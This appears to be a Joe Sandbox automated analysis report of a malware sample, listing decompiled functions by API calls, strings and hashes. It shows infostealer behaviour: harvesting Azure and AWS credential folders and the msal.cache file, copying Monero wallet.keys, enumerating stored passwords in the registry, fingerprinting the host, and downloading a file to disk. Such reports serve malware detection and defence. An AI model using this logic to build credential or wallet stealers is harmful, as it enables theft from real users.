Function 00964FF0 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0096A1F0: lstrlen.KERNEL32(00954F55,?,?,00954F55,00970DC6), ref: 0096A1FB
Part of subcall function 0096A1F0: lstrcpy.KERNEL32(00970DC6,00000000), ref: 0096A255

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00965124
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00965181
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00965337

Part of subcall function 0096A170: lstrcpy.KERNEL32(?,00000000), ref: 0096A1B6

Part of subcall function 00964CD0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00964D08

Part of subcall function 0096A270: lstrcpy.KERNEL32(?,00970DFF), ref: 0096A2D5

Part of subcall function 00964DA0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00964DF8
Part of subcall function 00964DA0: lstrlen.KERNEL32(00000000), ref: 00964E0F
Part of subcall function 00964DA0: StrStrA.SHLWAPI(00000000,00000000), ref: 00964E44
Part of subcall function 00964DA0: lstrlen.KERNEL32(00000000), ref: 00964E63
Part of subcall function 00964DA0: lstrlen.KERNEL32(00000000), ref: 00964E8E

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0096526B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00965420
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009654EC
Sleep.KERNEL32(0000EA60), ref: 009654FB

Strings

ERROR, xrefs: 00965173
ERROR, xrefs: 00965412
ERROR, xrefs: 0096525D
ERROR, xrefs: 009654DE
ERROR, xrefs: 00965329
ERROR, xrefs: 00965116

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-2791005934
Opcode ID: 774f4aada212039a6e7bb445f0e1efa92562630af5377cfddd61b8da96ac23a3
Instruction ID: 8911b9fbe71b1dc69a4346dc9580cf91056e2c73c3460ee960ce60e6b86090f2
Opcode Fuzzy Hash: 774f4aada212039a6e7bb445f0e1efa92562630af5377cfddd61b8da96ac23a3
Instruction Fuzzy Hash: E1E12C72914104AACB14FBA4DC96FED7738AFD5300F418529B90A67191EF35AF4CCBA2

Function 00964850 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00968880: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009688AB

lstrcat.KERNEL32(?,00000000), ref: 00964890
lstrcat.KERNEL32(?,\.azure\), ref: 009648AD

Part of subcall function 009643F0: wsprintfA.USER32 ref: 0096440C
Part of subcall function 009643F0: FindFirstFileA.KERNEL32(?,?), ref: 00964423

lstrcat.KERNEL32(?,00000000), ref: 0096491C
lstrcat.KERNEL32(?,\.aws\), ref: 00964939

Part of subcall function 009643F0: StrCmpCA.SHLWAPI(?,00970FAC), ref: 00964451
Part of subcall function 009643F0: StrCmpCA.SHLWAPI(?,00970FB0), ref: 00964467
Part of subcall function 009643F0: FindNextFileA.KERNEL32(000000FF,?), ref: 0096465D
Part of subcall function 009643F0: FindClose.KERNEL32(000000FF), ref: 00964672

lstrcat.KERNEL32(?,00000000), ref: 009649A8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 009649C5

Part of subcall function 009643F0: wsprintfA.USER32 ref: 00964490
Part of subcall function 009643F0: StrCmpCA.SHLWAPI(?,009708BA), ref: 009644A5
Part of subcall function 009643F0: wsprintfA.USER32 ref: 009644C2
Part of subcall function 009643F0: PathMatchSpecA.SHLWAPI(?,?), ref: 009644FE
Part of subcall function 009643F0: lstrcat.KERNEL32(?,0120F440), ref: 0096452A
Part of subcall function 009643F0: lstrcat.KERNEL32(?,00970FC8), ref: 0096453C
Part of subcall function 009643F0: lstrcat.KERNEL32(?,?), ref: 00964550
Part of subcall function 009643F0: lstrcat.KERNEL32(?,00970FCC), ref: 00964562
Part of subcall function 009643F0: lstrcat.KERNEL32(?,?), ref: 00964576
Part of subcall function 009643F0: CopyFileA.KERNEL32(?,?,00000001), ref: 0096458C
Part of subcall function 009643F0: DeleteFileA.KERNEL32(?), ref: 00964611

Strings

Azure\.azure, xrefs: 009648B3
\.aws\, xrefs: 0096492D
*.*, xrefs: 00964944
\.azure\, xrefs: 009648A1
\.IdentityService\, xrefs: 009649B9
Azure\.IdentityService, xrefs: 009649CB
msal.cache, xrefs: 009649D0
Azure\.aws, xrefs: 0096493F
*.*, xrefs: 009648B8

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: 38ba5ed87900d867256724dbbb26f0e0e6ab9040d454347c200e3a9aec1ff3ca
Instruction ID: 8f4fe136ba5dc6311bbbe0c9687800b6f53737631e1d9ab0a836c46d110cbe8b
Opcode Fuzzy Hash: 38ba5ed87900d867256724dbbb26f0e0e6ab9040d454347c200e3a9aec1ff3ca
Instruction Fuzzy Hash: 5A4193BA940204A7CB14F770DC57FDD77389BE4704F408554B64DA61C1EEB457C98BA2

Function 00951310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 009512A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009512B4
Part of subcall function 009512A0: RtlAllocateHeap.NTDLL(00000000), ref: 009512BB
Part of subcall function 009512A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 009512D7
Part of subcall function 009512A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009512F5
Part of subcall function 009512A0: RegCloseKey.ADVAPI32(?), ref: 009512FF

lstrcat.KERNEL32(?,00000000), ref: 0095134F
lstrlen.KERNEL32(?), ref: 0095135C
lstrcat.KERNEL32(?,.keys), ref: 00951377

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

Part of subcall function 0096A380: lstrlen.KERNEL32(?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 0096A395
Part of subcall function 0096A380: lstrcpy.KERNEL32(00000000), ref: 0096A3D4
Part of subcall function 0096A380: lstrcat.KERNEL32(00000000,00000000), ref: 0096A3E2

Part of subcall function 0096A270: lstrcpy.KERNEL32(?,00970DFF), ref: 0096A2D5

Part of subcall function 00968600: GetSystemTime.KERNEL32(00970E02,01209C18,0097059E,?,?,009513F9,?,0000001A,00970E02,00000000,?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 00968626

Part of subcall function 0096A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0096A342
Part of subcall function 0096A2F0: lstrcat.KERNEL32(00000000), ref: 0096A352

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00951465

Part of subcall function 0096A170: lstrcpy.KERNEL32(?,00000000), ref: 0096A1B6

Part of subcall function 00959A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00959A3C
Part of subcall function 00959A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00959A61
Part of subcall function 00959A10: LocalAlloc.KERNEL32(00000040,?), ref: 00959A81
Part of subcall function 00959A10: ReadFile.KERNEL32(000000FF,?,00000000,0095148F,00000000), ref: 00959AAA
Part of subcall function 00959A10: LocalFree.KERNEL32(0095148F), ref: 00959AE0
Part of subcall function 00959A10: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00959AEA

DeleteFileA.KERNEL32(00000000), ref: 009514EF

Strings

wallet_path, xrefs: 00951330
.keys, xrefs: 0095136B
SOFTWARE\monero-project\monero-core, xrefs: 00951335
\Monero\wallet.keys, xrefs: 0095138D

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateChangeCopyCreateDeleteFindFreeNotificationOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 2023266049-218353709
Opcode ID: 5b54957fa86ae880be9d9cd25ef1ce7dd182e25b9a71c21a5680944bcc35ca73
Instruction ID: 86cd56251e2f3b0d51189a06d5baf4f36bdfeeebb00d3914cad069bd26054044
Opcode Fuzzy Hash: 5b54957fa86ae880be9d9cd25ef1ce7dd182e25b9a71c21a5680944bcc35ca73
Instruction Fuzzy Hash: C251FEB19501199BCB15FB60DC96FED737CAF94304F4045A8B60A72092EF706B89CFA6

Function 00957610 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00957310: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0095737A
Part of subcall function 00957310: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009573F1
Part of subcall function 00957310: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0095744D
Part of subcall function 00957310: GetProcessHeap.KERNEL32(00000000,?), ref: 00957492
Part of subcall function 00957310: HeapFree.KERNEL32(00000000), ref: 00957499

lstrcat.KERNEL32(3586C020,009717A0), ref: 00957646
lstrcat.KERNEL32(3586C020,00000000), ref: 00957688
lstrcat.KERNEL32(3586C020, : ), ref: 0095769A
lstrcat.KERNEL32(3586C020,00000000), ref: 009576CF
lstrcat.KERNEL32(3586C020,009717A8), ref: 009576E0
lstrcat.KERNEL32(3586C020,00000000), ref: 00957713
lstrcat.KERNEL32(3586C020,009717AC), ref: 0095772D
task.LIBCPMTD ref: 0095773B

Strings

: , xrefs: 0095768E

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
String ID: :
API String ID: 2677904052-3653984579
Opcode ID: 54578300520f540f40b6caa42a8c8247c46bc328ddc2060ce98984b05e688945
Instruction ID: 9a7252f2de8658115729e735e5f008e4512da271d04a0d9599b4ee75aceb4371
Opcode Fuzzy Hash: 54578300520f540f40b6caa42a8c8247c46bc328ddc2060ce98984b05e688945
Instruction Fuzzy Hash: BA314276914109DBCB04EBE5EC96EEF7779AF84302F148018E50777250DE34AA8ACB61

Function 00966FA0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00966FE2
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0096701F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 009670A3
RtlAllocateHeap.NTDLL(00000000), ref: 009670AA
wsprintfA.USER32 ref: 009670E0

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

Strings

:, xrefs: 00966FFC
C, xrefs: 00966FEC
\, xrefs: 00967000

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 1544550907-3809124531
Opcode ID: a607dfd5969f776e07fa03fbd2207cca56aaf861a2edf99f9155908e3c3659a3
Instruction ID: 23a689b378b1d09f6c6529788d8790f5668edc90f282d59e16fd27e55e114cbd
Opcode Fuzzy Hash: a607dfd5969f776e07fa03fbd2207cca56aaf861a2edf99f9155908e3c3659a3
Instruction Fuzzy Hash: 2941B1B1D04248EBDB10DF94DC45BEEBBB8AF48714F100599F509A7280DB746A84CBA5

Function 00967BA0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0120E8C8,00000000,?,00970DFC,00000000,?,00000000), ref: 00967BD0
RtlAllocateHeap.NTDLL(00000000), ref: 00967BD7
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00967BF8
__aulldiv.LIBCMT ref: 00967C12
__aulldiv.LIBCMT ref: 00967C20
wsprintfA.USER32 ref: 00967C4C

Strings

%d MB, xrefs: 00967C43
@, xrefs: 00967BED

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2774356765-3474575989
Opcode ID: 0b77dca05a1309107c3133587a8536ea81948b964b90cba1fdd56cffbd29aa34
Instruction ID: 021c897f611c286085a81b531bfa1617dc41da1a8daa4b264f4605a3cff13c46
Opcode Fuzzy Hash: 0b77dca05a1309107c3133587a8536ea81948b964b90cba1fdd56cffbd29aa34
Instruction Fuzzy Hash: FF212EB1E44208ABDB00DFD5CC45FAEB778FB44B14F104509F619BB280CB7859008BA5

Function 009560F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0096A170: lstrcpy.KERNEL32(?,00000000), ref: 0096A1B6

Part of subcall function 00954800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 0095483A
Part of subcall function 00954800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00954852
Part of subcall function 00954800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00954868
Part of subcall function 00954800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00954889
Part of subcall function 00954800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00954899

InternetOpenA.WININET(00970DE2,00000001,00000000,00000000,00000000), ref: 0095615F
StrCmpCA.SHLWAPI(?,0120F340), ref: 00956197
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 009561DF
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00956203
InternetReadFile.WININET(?,?,00000400,?), ref: 0095622C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0095625A
CloseHandle.KERNEL32(?,?,00000400), ref: 00956299
InternetCloseHandle.WININET(?), ref: 009562A3
InternetCloseHandle.WININET(00000000), ref: 009562B0

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
